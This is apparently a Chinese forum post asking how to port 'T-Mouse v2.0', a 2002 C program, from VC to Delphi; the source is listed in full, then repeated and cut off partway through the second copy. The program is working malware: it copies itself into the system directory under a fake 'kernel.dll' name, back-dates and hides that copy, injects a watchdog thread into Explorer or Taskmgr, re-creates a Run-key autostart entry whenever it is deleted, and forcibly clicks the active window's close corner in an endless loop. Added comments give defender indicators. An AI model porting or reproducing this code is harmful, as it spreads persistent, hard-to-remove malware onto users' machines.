jingzux
以下是我从网上看到的VC代码,怎么转换成Delphi代码:
/*
---[ T-Mouse v2.0, by TOo2y ]---
---[ E-mail: TOo2y@safechina.net ]---
---[ HomePage: www.safechina.net ]---
---[ Date: 11-27-2002 ]---
*/
#define UNICODE
#define _UNICODE
#include <windows.h>
#include <tchar.h>
#include <conio.h>
#include <psapi.h>
/*
 * Parameter block for the injected thread. createremote() fills one in and
 * copies it into the target process with WriteProcessMemory; remote() then
 * receives its address as pvparam and takes every function address and every
 * string it uses from this block.
 */
typedef struct _remoteparameter
{
/* kernel32 export addresses obtained with GetProcAddress in createremote().
   They are stored as DWORD, so the code assumes 32-bit pointers. */
DWORD rpoutputdebugstring;
DWORD rpopenprocess;
DWORD rpwaitforsingleobject;
DWORD rpfindfirstfile;
DWORD rpcopyfile;
DWORD rpfindclose;
DWORD rpwinexec;
/* Process ID of the process that performed the injection (GetCurrentProcessId). */
DWORD rpmousepid;
/* Written by remote(): the OpenProcess handle for rpmousepid and the
   FindFirstFile result. */
HANDLE rpprocesshandle;
HANDLE rpfilehandle;
/* Copies of createremote()'s two path arguments (ctname, ckname). */
TCHAR rptname[MAX_PATH];
TCHAR rpkname[MAX_PATH];
/* ctname converted with WideCharToMultiByte; remote() passes it to WinExec. */
char rpwinexecname[MAX_PATH];
/* Output buffer for the FindFirstFile call made in remote(). */
WIN32_FIND_DATA rpfdata;
/* Fixed messages that remote() sends to OutputDebugString. */
TCHAR rpoperror[30];
TCHAR rpffferror[30];
TCHAR rpcferror[30];
TCHAR rpfcerror[30];
TCHAR rpweerror[30];
TCHAR rpstring[30];
TCHAR rpwfsosignal[30];
}REMOTEPARAMETER, *PREMOTEPARAMETER;
/* Forward declarations for the routines defined after main(). */
DWORD WINAPI remote(LPVOID pvparam);
DWORD WINAPI watch(LPVOID pvparam);
DWORD processtopid(TCHAR *processname);
HANDLE createremote(PTSTR,PTSTR);
void start(void);
/* Handle of the watch() thread; assigned in main(). */
HANDLE wthread;
/*
 * Suffixes appended to the GetSystemDirectory() result in main() and watch().
 * NOTE(review): the "//" here, like the "/n" in the message strings, looks like
 * the forum's rendering of backslash sequences - confirm against the original
 * before using these file names as indicators.
 */
TCHAR *name1=_T("//T-Mouse.exe");
TCHAR *name2=_T("//kernel.dll");
/*
 * Entry point. In order, the code below:
 *   1. builds two paths from the system directory plus name1 and name2;
 *   2. copies the running executable to the first path if no file is there;
 *   3. copies it again to the second (DLL-looking) path if no file is there,
 *      back-dates that copy and marks it read-only, hidden and system;
 *   4. calls createremote() to start a thread inside another process and
 *      starts the watch() thread;
 *   5. loops forever steering the cursor to a small area near the top-right
 *      corner of the foreground window and clicking there.
 * Every failure path logs through OutputDebugString, waits for a key with
 * getche() and returns -1.
 *
 * Defender notes: the observable artefacts are executable files written into
 * the system directory by a non-installer process (Sysmon event 11), a
 * creation-time change on one of them (Sysmon event 2, ATT&CK T1070.006),
 * hidden/system attributes (T1564.001) and a system-library-like file name
 * that is really a copy of the executable (T1036).
 */
int main()
{
WIN32_FIND_DATA fdata;
HANDLE ffhandle;
HANDLE fchandle;
SYSTEMTIME stime;
FILETIME ftime;
TCHAR syspath[MAX_PATH];
TCHAR curname[MAX_PATH];
TCHAR tname[MAX_PATH];
TCHAR kname[MAX_PATH];
int ret;
HANDLE rthread;
HWND hwnd;
RECT rt;
POINT ptnew;
TCHAR title[250];
WINDOWPLACEMENT wp;
/* Runs the shell's "color" command, then prints the banner. */
system("color 0A");
start();
ret=GetSystemDirectory(syspath,MAX_PATH);
if(ret==0)
{
OutputDebugString(_T("GetSystemDirectory Error/n"));
getche();
return -1;
}
/* tname = system directory + name1, kname = system directory + name2. */
_tcscpy(tname,syspath);
_tcscat(tname,name1);
_tcscpy(kname,syspath);
_tcscat(kname,name2);
/* First copy: only made when FindFirstFile reports the file as missing. */
ffhandle=FindFirstFile(tname,&fdata);
if(ffhandle==INVALID_HANDLE_VALUE)
{
/* 2 is ERROR_FILE_NOT_FOUND. */
if(GetLastError()==2)
{
ret=GetModuleFileName(NULL,curname,MAX_PATH);
if(ret==0)
{
OutputDebugString(_T("GetModuleFileName Error/n"));
getche();
return -1;
}
/* TRUE = fail rather than overwrite an existing file. */
if(!CopyFile(curname,tname,TRUE))
{
OutputDebugString(_T("CopyFile Error/n"));
getche();
return -1;
}
}
else
{
OutputDebugString(_T("FindFirstFile Error/n"));
getche();
return -1;
}
}
else
if(!FindClose(ffhandle))
{
OutputDebugString(_T("FindClose Error/n"));
getche();
return -1;
}
/* Second copy: same existence test, followed by timestamp and attribute changes. */
ffhandle=FindFirstFile(kname,&fdata);
if(ffhandle==INVALID_HANDLE_VALUE)
{
if(GetLastError()==2)
{
ret=GetModuleFileName(NULL,curname,MAX_PATH);
if(ret==0)
{
OutputDebugString(_T("GetModuleFileName Error/n"));
getche();
return -1;
}
if(!CopyFile(curname,kname,TRUE))
{
OutputDebugString(_T("CopyFile Error/n"));
getche();
return -1;
}
fchandle=CreateFile(kname,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
if(fchandle==INVALID_HANDLE_VALUE)
{
OutputDebugString(_T("CreateFile Error/n"));
getche();
return -1;
}
/* Fixed date of 12 January 2002, 01:00, used as the file's new timestamps. */
memset(&stime,0,sizeof(stime));
stime.wYear=2002;
stime.wMonth=1;
stime.wDay=12;
stime.wDayOfWeek=5;
stime.wHour=1;
if(!SystemTimeToFileTime(&stime,&ftime))
{
OutputDebugString(_T("SystemTimeToFileTime Error/n"));
CloseHandle(fchandle);
getche();
return -1;
}
/* Sets creation time and last-write time; last-access (NULL) is left alone. */
if(!SetFileTime(fchandle,&ftime,NULL,&ftime))
{
OutputDebugString(_T("SetFileTime Error/n"));
CloseHandle(fchandle);
getche();
return -1;
}
if(!SetFileAttributes(kname,
FILE_ATTRIBUTE_READONLY |
FILE_ATTRIBUTE_HIDDEN |
FILE_ATTRIBUTE_SYSTEM ))
{
OutputDebugString(_T("SetFileAttributes Error/n"));
CloseHandle(fchandle);
getche();
return -1;
}
CloseHandle(fchandle);
}
else
{
OutputDebugString(_T("FindFirstFile Error/n"));
getche();
return -1;
}
}
else
if(!FindClose(ffhandle))
{
OutputDebugString(_T("FindClose Error/n"));
getche();
return -1;
}
/* Start the thread in the other process; rthread is that thread's handle. */
if((rthread=createremote(tname,kname))==NULL)
{
OutputDebugString(_T("CreateRemote Error/n"));
getche();
return -1;
}
/* watch() receives the remote thread handle as its parameter. */
wthread=CreateThread(NULL,0,watch,(LPVOID)rthread,0,NULL);
if(wthread==NULL)
{
OutputDebugString(_T("CreateThread Error/n"));
CloseHandle(rthread);
getche();
return -1;
}
/*
 * Nuisance loop, repeated every millisecond: move the cursor 3 pixels per
 * pass toward the box x in [right-15, right-12], y in [top+12, top+15] of
 * the foreground window (presumably where its close button sits - the code
 * only shows the coordinates) and, once inside it, send a left click if the
 * window is not minimized and has a non-empty title.
 */
while(1)
{
hwnd=GetForegroundWindow();
GetWindowRect(hwnd,&rt);
GetCursorPos(&ptnew);
GetWindowText(hwnd,title,250);
GetWindowPlacement(hwnd,&wp);
if(ptnew.x<rt.right-15)
ptnew.x+=3;
else
if(ptnew.x>rt.right-12)
ptnew.x-=3;
if(ptnew.y<rt.top+12)
ptnew.y+=3;
else
if(ptnew.y>rt.top+15)
ptnew.y-=3;
SetCursorPos(ptnew.x,ptnew.y);
if((ptnew.x>=rt.right-15) &&
(ptnew.x<=rt.right-12)
&&
(ptnew.y>=rt.top+12) &&
(ptnew.y<=rt.top+15)
&&
(wp.showCmd!=SW_SHOWMINIMIZED)
&&
(_tcslen(title)!=0))
{
mouse_event(MOUSEEVENTF_LEFTDOWN,ptnew.x,ptnew.y,0,0);
mouse_event(MOUSEEVENTF_LEFTUP,ptnew.x,ptnew.y,0,0);
}
Sleep(1);
}
/* Not reached: the loop above has no break. */
getche();
return 0;
}
/*
 * Looks for a running process whose main module base name equals processname
 * (case-insensitive, via _tcsicmp).
 *
 * Returns (DWORD)-1 when EnumProcesses fails and 0 when the loop finds no
 * match; the match branch is meant to return the matching process ID.
 *
 * NOTE(review): as posted, the array name lpidprocesses is used where a single
 * process ID is expected (OpenProcess argument and return value); an index
 * expression appears to have been lost in the listing - confirm against the
 * original.
 *
 * Defender note: enumerating all processes and opening each one with
 * PROCESS_QUERY_INFORMATION | PROCESS_VM_READ to read its module name is the
 * target-selection step that precedes the injection in createremote().
 */
DWORD processtopid(TCHAR *processname)
{
DWORD lpidprocesses[1024],cbneeded,cprocesses;
HANDLE hprocess;
HMODULE hmodule;
UINT i;
TCHAR normalname[MAX_PATH]=_T("UnknownProcess");
if(!EnumProcesses(lpidprocesses,sizeof(lpidprocesses),&cbneeded))
{
OutputDebugString(_T("EnumProcesses Error/n"));
return -1;
}
/* cbneeded is a byte count; convert it to a number of process IDs. */
cprocesses=cbneeded/sizeof(DWORD);
for(i=0;i<cprocesses;i++)
{
hprocess=OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,FALSE,lpidprocesses);
if(hprocess)
{
/* Only the first module handle is requested (buffer holds one HMODULE). */
if(EnumProcessModules(hprocess,&hmodule,sizeof(hmodule),&cbneeded))
{
GetModuleBaseName(hprocess,hmodule,normalname,sizeof(normalname));
if(!_tcsicmp(normalname,processname))
{
CloseHandle(hprocess);
return (lpidprocesses);
}
}
}
}
/* Handles of non-matching processes are not closed inside the loop; only the
   last value of hprocess is closed here. */
CloseHandle(hprocess);
return 0;
}
/*
 * Starts remote() as a thread inside another process.
 *
 * ctname and ckname are the two file paths that end up in the parameter block
 * (rptname / rpkname). The function returns the remote thread's handle, or
 * NULL when process enumeration, a remote allocation, a remote write or
 * CreateRemoteThread fails.
 *
 * Steps shown below: pick a target by name, open it with thread-creation and
 * memory-write rights, allocate executable memory in it, copy the bytes found
 * at remote()'s address, copy a filled-in REMOTEPARAMETER, then create the
 * thread.
 *
 * Defender notes: this is the VirtualAllocEx / WriteProcessMemory /
 * CreateRemoteThread injection sequence (ATT&CK T1055). Typical telemetry is
 * a cross-process open requesting PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION
 * | PROCESS_VM_WRITE (Sysmon event 10), a PAGE_EXECUTE_READWRITE region that
 * is not backed by any module, and a thread whose start address lies in that
 * region (Sysmon event 8).
 */
HANDLE createremote(PTSTR ctname,PTSTR ckname)
{
HANDLE ethread;
HANDLE rphandle;
TCHAR name[2][15];
TCHAR *remotethr;
TCHAR *remotepar;
DWORD remotepid;
int cb;
int signal;
HINSTANCE hkernel32;
REMOTEPARAMETER rp;
_tcscpy(name[0],_T("Explorer.exe"));
_tcscpy(name[1],_T("Taskmgr.exe"));
/* signal is pre-incremented before use, so the first lookup uses name[0] and
   the two names then alternate on every retry. */
signal=1;
while(1)
{
remotepid=processtopid(name[(++signal)%2]);
if(remotepid==-1)
{
return NULL;
}
else
if(remotepid==0)
{
if(signal%2==0)
{
OutputDebugString(_T("Remote Process Explorer isn't running/n"));
}
else
{
OutputDebugString(_T("Remote Process Taskmgr isn't running/n"));
}
Sleep(1000);
continue;
}
rphandle=OpenProcess(PROCESS_CREATE_THREAD |
PROCESS_VM_OPERATION |
PROCESS_VM_WRITE,
FALSE,remotepid);
if(rphandle==NULL)
{
Sleep(1000);
continue;
}
else
{
break;
}
}
/* Fixed-size region (4096 TCHARs) for the thread code; the size is a constant,
   not the measured length of remote(). */
cb=sizeof(TCHAR)*4*1024;
remotethr=(PTSTR)VirtualAllocEx(rphandle,NULL,cb,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
if(remotethr==NULL)
{
OutputDebugString(_T("VirtualAllocEx for Thread Error/n"));
CloseHandle(rphandle);
return NULL;
}
/* Copies cb bytes starting at the address of remote() in this process. */
if(WriteProcessMemory(rphandle,remotethr,(LPVOID)remote,cb,NULL)==FALSE)
{
OutputDebugString(_T("WriteProcessMemory for Thread Error/n"));
CloseHandle(rphandle);
return NULL;
}
{
/* Fill the parameter block: caller's PID, message strings, both paths, an
   ANSI copy of ctname, and the kernel32 function addresses. */
memset(&rp,0,sizeof(rp));
rp.rpmousepid=GetCurrentProcessId();
_tcscpy(rp.rpstring,_T("i am in remote process/n"));
_tcscpy(rp.rpcferror,_T("CopyFile Error/n"));
_tcscpy(rp.rpfcerror,_T("FindClose Error/n"));
_tcscpy(rp.rpffferror,_T("FindFirstFile Error/n"));
_tcscpy(rp.rpoperror,_T("OpenProcess Error/n"));
_tcscpy(rp.rpweerror,_T("WinExec Error/n"));
_tcscpy(rp.rpwfsosignal,_T("i am out of remote process/n"));
_tcscpy(rp.rptname,ctname);
_tcscpy(rp.rpkname,ckname);
WideCharToMultiByte(CP_ACP,0,ctname,-1,rp.rpwinexecname,_tcslen(ctname),NULL,NULL);
/* Addresses are resolved in this process; the code assumes they are also
   valid inside the target. */
hkernel32=GetModuleHandle(_T("kernel32.dll"));
rp.rpoutputdebugstring=(DWORD)GetProcAddress(hkernel32,"OutputDebugStringW");
rp.rpopenprocess=(DWORD)GetProcAddress(hkernel32,"OpenProcess");
rp.rpwaitforsingleobject=(DWORD)GetProcAddress(hkernel32,"WaitForSingleObject");
rp.rpfindfirstfile=(DWORD)GetProcAddress(hkernel32,"FindFirstFileW");
rp.rpcopyfile=(DWORD)GetProcAddress(hkernel32,"CopyFileW");
rp.rpfindclose=(DWORD)GetProcAddress(hkernel32,"FindClose");
rp.rpwinexec=(DWORD)GetProcAddress(hkernel32,"WinExec");
}
/* Size used for both the remote allocation and the write: sizeof(rp)
   multiplied by sizeof(TCHAR). */
cb=sizeof(TCHAR)*sizeof(rp);
remotepar=(PTSTR)VirtualAllocEx(rphandle,NULL,cb,MEM_COMMIT,PAGE_READWRITE);
if(remotepar==NULL)
{
OutputDebugString(_T("VirtualAllocEx for Parameter Error/n"));
CloseHandle(rphandle);
return NULL;
}
if(WriteProcessMemory(rphandle,remotepar,(LPVOID)&rp,cb,NULL)==FALSE)
{
OutputDebugString(_T("WriteProcessMemory for Parameter Error:"));
CloseHandle(rphandle);
return NULL;
}
/* Thread entry is the copied code; its argument is the copied parameter block. */
ethread=CreateRemoteThread(rphandle,NULL,0,(LPTHREAD_START_ROUTINE)remotethr,(LPVOID)remotepar,0,NULL);
if(ethread==NULL)
{
OutputDebugString(_T("CreateRemoteThread Error/n"));
CloseHandle(rphandle);
return NULL;
}
/* rphandle is not closed on this path; only the thread handle is returned. */
return ethread;
}
void start()
{
_tprintf(_T("---[ T-Mouse v2.0, by TOo2y ]---/n"));
_tprintf(_T("---[ E-mail: TOo2y@safechina.net ]---/n"));
_tprintf(_T("---[ HomePage: www.safechina.net ]---/n"));
_tprintf(_T("---[ Date: 11-27-2002 ]---/n/n"));
return;
}
/*
 * Watchdog thread started by main(). pvparam is the handle of the thread
 * created by createremote().
 *
 * Once per second it (a) queries the value "T-Mouse" under the HKLM key named
 * by rgspath and, if the query fails, writes that value with wtname as data,
 * and (b) checks whether the remote thread has exited and, if so, calls
 * createremote() again. Returns (DWORD)-1 if the system directory cannot be
 * read, otherwise 0 after a registry call fails and ends the loop.
 *
 * Defender notes: this is autostart persistence through a Run key (ATT&CK
 * T1547.001) that is re-created within about a second of being deleted, so
 * removing the value while the process is alive has no lasting effect. The
 * value name "T-Mouse" and the repeated registry write (Sysmon event 13) are
 * the indicators visible here.
 * NOTE(review): rgspath is shown with "//" separators; this looks like the
 * forum's rendering of backslashes - confirm against the original.
 */
DWORD WINAPI watch(LPVOID pvparam)
{
HANDLE wethread=(HANDLE)pvparam;
DWORD exitcode;
HKEY hkey;
TCHAR sname[MAX_PATH];
TCHAR wtname[MAX_PATH];
TCHAR wkname[MAX_PATH];
TCHAR lpdata[MAX_PATH];
LPCTSTR rgspath=_T("Software//Microsoft//Windows//CurrentVersion//Run");
DWORD type=REG_SZ;
DWORD dwbuflen=MAX_PATH;
int ret;
if((ret=GetSystemDirectory(sname,MAX_PATH))==0)
{
OutputDebugString(_T("GetSystemDirectory in watch Error/n"));
return -1;
}
/* Same two paths that main() builds: system directory + name1 / name2. */
_tcscpy(wtname,sname);
_tcscat(wtname,name1);
_tcscpy(wkname,sname);
_tcscat(wkname,name2);
while(1)
{
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,rgspath,0,KEY_QUERY_VALUE,&hkey);
if(ret!=ERROR_SUCCESS)
{
OutputDebugString(_T("RegOpenKeyEx for KEY_QUERY_VALUE Error/n"));
break;
}
/* dwbuflen is an in/out byte count for this call and is reused below. */
ret=RegQueryValueEx(hkey,_T("T-Mouse"),NULL,NULL,(LPBYTE)lpdata,&dwbuflen);
RegCloseKey(hkey);
/* Any query failure is treated as "value missing" and triggers a rewrite. */
if(ret!=ERROR_SUCCESS)
{
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,rgspath,0,KEY_WRITE,&hkey);
if(ret!=ERROR_SUCCESS)
{
OutputDebugString(_T("RegOpenKeyEx for KEY_WRITE Error/n"));
break;
}
/* Data is wtname; the byte count passed is whatever dwbuflen holds after
   the query above. */
ret=RegSetValueEx(hkey,_T("T-Mouse"),NULL,type,(const byte *)wtname,dwbuflen);
RegCloseKey(hkey);
if(ret!=ERROR_SUCCESS)
{
OutputDebugString(_T("RegSetValueEx Error/n"));
break;
}
}
/* Re-inject when the remote thread is no longer running; the result of
   GetExitCodeThread itself is not checked. */
GetExitCodeThread(wethread,&exitcode);
if(exitcode!=STILL_ACTIVE)
{
wethread=createremote(wtname,wkname);
}
Sleep(1000);
}
return 0;
}
/*
 * Thread routine whose bytes createremote() copies into another process.
 * pvparam points to the REMOTEPARAMETER block copied alongside it.
 *
 * The routine calls no function by name and uses no string literal: every API
 * is reached through an address stored in the block and every message is a
 * buffer in the block.
 *
 * Behaviour shown below: open the originating process (rpmousepid), block
 * until that process ends, check that rptname exists (copying rpkname to it
 * if FindFirstFile fails), then launch rpwinexecname with WinExec. Returns 0
 * on success and (DWORD)-1 after any failed step.
 *
 * Defender notes: this is the second half of a mutual watchdog - terminating
 * only the original process causes the host process to start it again, so
 * remediation has to deal with the injected thread (or its host process) and
 * both on-disk copies, not just the visible process. A process launch whose
 * parent is the injected host is the telemetry this step produces.
 */
DWORD WINAPI remote(LPVOID pvparam)
{
PREMOTEPARAMETER erp=(PREMOTEPARAMETER)pvparam;
/* Function-pointer types matching the kernel32 exports resolved in createremote(). */
typedef VOID (WINAPI *EOutputDebugString)(LPCTSTR);
typedef HANDLE (WINAPI *EOpenProcess)(DWORD, BOOL, DWORD);
typedef DWORD (WINAPI *EWaitForSingleObject)(HANDLE, DWORD);
typedef HANDLE (WINAPI *EFindFirstFile)(LPCTSTR, LPWIN32_FIND_DATA);
typedef BOOL (WINAPI *ECopyFile)(LPCTSTR, LPCTSTR, BOOL);
typedef BOOL (WINAPI *EFindClose)(HANDLE);
typedef UINT (WINAPI *EWinExec)(LPCSTR, UINT);
EOutputDebugString tOutputDebugString;
EOpenProcess tOpenProcess;
EWaitForSingleObject tWaitForSingleObject;
EFindFirstFile tFindFirstFile;
ECopyFile tCopyFile;
EFindClose tFindClose;
EWinExec tWinExec;
/* Load the call targets from the parameter block. */
tOutputDebugString=(EOutputDebugString)erp->rpoutputdebugstring;
tOpenProcess=(EOpenProcess)erp->rpopenprocess;
tWaitForSingleObject=(EWaitForSingleObject)erp->rpwaitforsingleobject;
tFindFirstFile=(EFindFirstFile)erp->rpfindfirstfile;
tCopyFile=(ECopyFile)erp->rpcopyfile;
tFindClose=(EFindClose)erp->rpfindclose;
tWinExec=(EWinExec)erp->rpwinexec;
tOutputDebugString(erp->rpstring);
erp->rpprocesshandle=tOpenProcess(PROCESS_ALL_ACCESS,FALSE,erp->rpmousepid);
if(erp->rpprocesshandle==NULL)
{
tOutputDebugString(erp->rpoperror);
return -1;
}
/* Blocks here until the originating process terminates. */
tWaitForSingleObject(erp->rpprocesshandle,INFINITE);
tOutputDebugString(erp->rpwfsosignal);
erp->rpfilehandle=tFindFirstFile(erp->rptname,&erp->rpfdata);
if(erp->rpfilehandle==INVALID_HANDLE_VALUE)
{
tOutputDebugString(erp->rpffferror);
/* Restore the first file from the second copy; TRUE = do not overwrite. */
if(!tCopyFile(erp->rpkname,erp->rptname,TRUE))
{
tOutputDebugString(erp->rpcferror);
return -1;
}
}
if(!tFindClose(erp->rpfilehandle))
{
tOutputDebugString(erp->rpfcerror);
return -1;
}
/* WinExec reports failure with a value of 31 or less; show-command 0 is SW_HIDE. */
if(tWinExec(erp->rpwinexecname, 0)<=31)
{
tOutputDebugString(erp->rpweerror);
return -1;
}
return 0;
}
/*
---[ T-Mouse v2.0, by TOo2y ]---
---[ E-mail: TOo2y@safechina.net ]---
---[ HomePage: www.safechina.net ]---
---[ Date: 11-27-2002 ]---
*/
#define UNICODE
#define _UNICODE
#include <windows.h>
#include <tchar.h>
#include <conio.h>
#include <psapi.h>
/*
 * Parameter block for the injected thread. createremote() fills one in and
 * copies it into the target process with WriteProcessMemory; remote() then
 * receives its address as pvparam and takes every function address and every
 * string it uses from this block.
 */
typedef struct _remoteparameter
{
/* kernel32 export addresses obtained with GetProcAddress in createremote().
   They are stored as DWORD, so the code assumes 32-bit pointers. */
DWORD rpoutputdebugstring;
DWORD rpopenprocess;
DWORD rpwaitforsingleobject;
DWORD rpfindfirstfile;
DWORD rpcopyfile;
DWORD rpfindclose;
DWORD rpwinexec;
/* Process ID of the process that performed the injection (GetCurrentProcessId). */
DWORD rpmousepid;
/* Written by remote(): the OpenProcess handle for rpmousepid and the
   FindFirstFile result. */
HANDLE rpprocesshandle;
HANDLE rpfilehandle;
/* Copies of createremote()'s two path arguments (ctname, ckname). */
TCHAR rptname[MAX_PATH];
TCHAR rpkname[MAX_PATH];
/* ctname converted with WideCharToMultiByte; remote() passes it to WinExec. */
char rpwinexecname[MAX_PATH];
/* Output buffer for the FindFirstFile call made in remote(). */
WIN32_FIND_DATA rpfdata;
/* Fixed messages that remote() sends to OutputDebugString. */
TCHAR rpoperror[30];
TCHAR rpffferror[30];
TCHAR rpcferror[30];
TCHAR rpfcerror[30];
TCHAR rpweerror[30];
TCHAR rpstring[30];
TCHAR rpwfsosignal[30];
}REMOTEPARAMETER, *PREMOTEPARAMETER;
/* Forward declarations for the routines defined after main(). */
DWORD WINAPI remote(LPVOID pvparam);
DWORD WINAPI watch(LPVOID pvparam);
DWORD processtopid(TCHAR *processname);
HANDLE createremote(PTSTR,PTSTR);
void start(void);
/* Handle of the watch() thread; assigned in main(). */
HANDLE wthread;
/*
 * Suffixes appended to the GetSystemDirectory() result in main() and watch().
 * NOTE(review): the "//" here, like the "/n" in the message strings, looks like
 * the forum's rendering of backslash sequences - confirm against the original
 * before using these file names as indicators.
 */
TCHAR *name1=_T("//T-Mouse.exe");
TCHAR *name2=_T("//kernel.dll");
/*
 * Entry point. In order, the code below:
 *   1. builds two paths from the system directory plus name1 and name2;
 *   2. copies the running executable to the first path if no file is there;
 *   3. copies it again to the second (DLL-looking) path if no file is there,
 *      back-dates that copy and marks it read-only, hidden and system;
 *   4. calls createremote() to start a thread inside another process and
 *      starts the watch() thread;
 *   5. loops forever steering the cursor to a small area near the top-right
 *      corner of the foreground window and clicking there.
 * Every failure path logs through OutputDebugString, waits for a key with
 * getche() and returns -1.
 *
 * Defender notes: the observable artefacts are executable files written into
 * the system directory by a non-installer process (Sysmon event 11), a
 * creation-time change on one of them (Sysmon event 2, ATT&CK T1070.006),
 * hidden/system attributes (T1564.001) and a system-library-like file name
 * that is really a copy of the executable (T1036).
 */
int main()
{
WIN32_FIND_DATA fdata;
HANDLE ffhandle;
HANDLE fchandle;
SYSTEMTIME stime;
FILETIME ftime;
TCHAR syspath[MAX_PATH];
TCHAR curname[MAX_PATH];
TCHAR tname[MAX_PATH];
TCHAR kname[MAX_PATH];
int ret;
HANDLE rthread;
HWND hwnd;
RECT rt;
POINT ptnew;
TCHAR title[250];
WINDOWPLACEMENT wp;
/* Runs the shell's "color" command, then prints the banner. */
system("color 0A");
start();
ret=GetSystemDirectory(syspath,MAX_PATH);
if(ret==0)
{
OutputDebugString(_T("GetSystemDirectory Error/n"));
getche();
return -1;
}
/* tname = system directory + name1, kname = system directory + name2. */
_tcscpy(tname,syspath);
_tcscat(tname,name1);
_tcscpy(kname,syspath);
_tcscat(kname,name2);
/* First copy: only made when FindFirstFile reports the file as missing. */
ffhandle=FindFirstFile(tname,&fdata);
if(ffhandle==INVALID_HANDLE_VALUE)
{
/* 2 is ERROR_FILE_NOT_FOUND. */
if(GetLastError()==2)
{
ret=GetModuleFileName(NULL,curname,MAX_PATH);
if(ret==0)
{
OutputDebugString(_T("GetModuleFileName Error/n"));
getche();
return -1;
}
/* TRUE = fail rather than overwrite an existing file. */
if(!CopyFile(curname,tname,TRUE))
{
OutputDebugString(_T("CopyFile Error/n"));
getche();
return -1;
}
}
else
{
OutputDebugString(_T("FindFirstFile Error/n"));
getche();
return -1;
}
}
else
if(!FindClose(ffhandle))
{
OutputDebugString(_T("FindClose Error/n"));
getche();
return -1;
}
/* Second copy: same existence test, followed by timestamp and attribute changes. */
ffhandle=FindFirstFile(kname,&fdata);
if(ffhandle==INVALID_HANDLE_VALUE)
{
if(GetLastError()==2)
{
ret=GetModuleFileName(NULL,curname,MAX_PATH);
if(ret==0)
{
OutputDebugString(_T("GetModuleFileName Error/n"));
getche();
return -1;
}
if(!CopyFile(curname,kname,TRUE))
{
OutputDebugString(_T("CopyFile Error/n"));
getche();
return -1;
}
fchandle=CreateFile(kname,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
if(fchandle==INVALID_HANDLE_VALUE)
{
OutputDebugString(_T("CreateFile Error/n"));
getche();
return -1;
}
/* Fixed date of 12 January 2002, 01:00, used as the file's new timestamps. */
memset(&stime,0,sizeof(stime));
stime.wYear=2002;
stime.wMonth=1;
stime.wDay=12;
stime.wDayOfWeek=5;
stime.wHour=1;
if(!SystemTimeToFileTime(&stime,&ftime))
{
OutputDebugString(_T("SystemTimeToFileTime Error/n"));
CloseHandle(fchandle);
getche();
return -1;
}
/* Sets creation time and last-write time; last-access (NULL) is left alone. */
if(!SetFileTime(fchandle,&ftime,NULL,&ftime))
{
OutputDebugString(_T("SetFileTime Error/n"));
CloseHandle(fchandle);
getche();
return -1;
}
if(!SetFileAttributes(kname,
FILE_ATTRIBUTE_READONLY |
FILE_ATTRIBUTE_HIDDEN |
FILE_ATTRIBUTE_SYSTEM ))
{
OutputDebugString(_T("SetFileAttributes Error/n"));
CloseHandle(fchandle);
getche();
return -1;
}
CloseHandle(fchandle);
}
else
{
OutputDebugString(_T("FindFirstFile Error/n"));
getche();
return -1;
}
}
else
if(!FindClose(ffhandle))
{
OutputDebugString(_T("FindClose Error/n"));
getche();
return -1;
}
/* Start the thread in the other process; rthread is that thread's handle. */
if((rthread=createremote(tname,kname))==NULL)
{
OutputDebugString(_T("CreateRemote Error/n"));
getche();
return -1;
}
/* watch() receives the remote thread handle as its parameter. */
wthread=CreateThread(NULL,0,watch,(LPVOID)rthread,0,NULL);
if(wthread==NULL)
{
OutputDebugString(_T("CreateThread Error/n"));
CloseHandle(rthread);
getche();
return -1;
}
/*
 * Nuisance loop, repeated every millisecond: move the cursor 3 pixels per
 * pass toward the box x in [right-15, right-12], y in [top+12, top+15] of
 * the foreground window (presumably where its close button sits - the code
 * only shows the coordinates) and, once inside it, send a left click if the
 * window is not minimized and has a non-empty title.
 */
while(1)
{
hwnd=GetForegroundWindow();
GetWindowRect(hwnd,&rt);
GetCursorPos(&ptnew);
GetWindowText(hwnd,title,250);
GetWindowPlacement(hwnd,&wp);
if(ptnew.x<rt.right-15)
ptnew.x+=3;
else
if(ptnew.x>rt.right-12)
ptnew.x-=3;
if(ptnew.y<rt.top+12)
ptnew.y+=3;
else
if(ptnew.y>rt.top+15)
ptnew.y-=3;
SetCursorPos(ptnew.x,ptnew.y);
if((ptnew.x>=rt.right-15) &&
(ptnew.x<=rt.right-12)
&&
(ptnew.y>=rt.top+12) &&
(ptnew.y<=rt.top+15)
&&
(wp.showCmd!=SW_SHOWMINIMIZED)
&&
(_tcslen(title)!=0))
{
mouse_event(MOUSEEVENTF_LEFTDOWN,ptnew.x,ptnew.y,0,0);
mouse_event(MOUSEEVENTF_LEFTUP,ptnew.x,ptnew.y,0,0);
}
Sleep(1);
}
/* Not reached: the loop above has no break. */
getche();
return 0;
}
/*
 * Looks for a running process whose main module base name equals processname
 * (case-insensitive, via _tcsicmp).
 *
 * Returns (DWORD)-1 when EnumProcesses fails and 0 when the loop finds no
 * match; the match branch is meant to return the matching process ID.
 *
 * NOTE(review): as posted, the array name lpidprocesses is used where a single
 * process ID is expected (OpenProcess argument and return value); an index
 * expression appears to have been lost in the listing - confirm against the
 * original.
 *
 * Defender note: enumerating all processes and opening each one with
 * PROCESS_QUERY_INFORMATION | PROCESS_VM_READ to read its module name is the
 * target-selection step that precedes the injection in createremote().
 */
DWORD processtopid(TCHAR *processname)
{
DWORD lpidprocesses[1024],cbneeded,cprocesses;
HANDLE hprocess;
HMODULE hmodule;
UINT i;
TCHAR normalname[MAX_PATH]=_T("UnknownProcess");
if(!EnumProcesses(lpidprocesses,sizeof(lpidprocesses),&cbneeded))
{
OutputDebugString(_T("EnumProcesses Error/n"));
return -1;
}
/* cbneeded is a byte count; convert it to a number of process IDs. */
cprocesses=cbneeded/sizeof(DWORD);
for(i=0;i<cprocesses;i++)
{
hprocess=OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,FALSE,lpidprocesses);
if(hprocess)
{
/* Only the first module handle is requested (buffer holds one HMODULE). */
